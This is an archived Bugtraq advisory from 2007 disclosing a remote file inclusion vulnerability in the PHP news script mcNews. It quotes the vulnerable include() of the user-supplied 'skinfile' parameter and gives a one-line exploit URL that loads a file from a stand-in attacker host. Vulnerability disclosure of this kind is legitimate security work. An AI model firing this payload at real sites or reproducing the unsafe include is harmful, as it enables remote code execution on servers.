[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070811150954.11489.qmail@securityfocus.com>
Date: 11 Aug 2007 15:09:54 -0000
From: ilkerkandemir@...et.com
To: bugtraq@...urityfocus.com
Subject: mcNews (skinfile) Remote File Include Vulnerability
-------------------------------------------------------------------------------------------------------------------
MEFISTO PreSents...
Script: mcNews
Script Download: ftp://ftp1.comscripts.com/PHP/845_mcnews-13.zip
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
info:
/* MEFISTO */
-------------------------------------------------------------------------------------------------------------------
Code:
if($voir!='') {
$skinfile=strstr($skinfile, 'skin');
include ("$skinfile");
-------------------------------------------------------------------------------------------------------------------
Exploit:
http://[site]/[news_path]/admin/header.php?skinfile=http://attacker.txt?
-------------------------------------------------------------------------------------------------------------------
Tnx:dumenci,h0tturk,ajann
# MefistoLabs.Com
Powered by blists - more mailing lists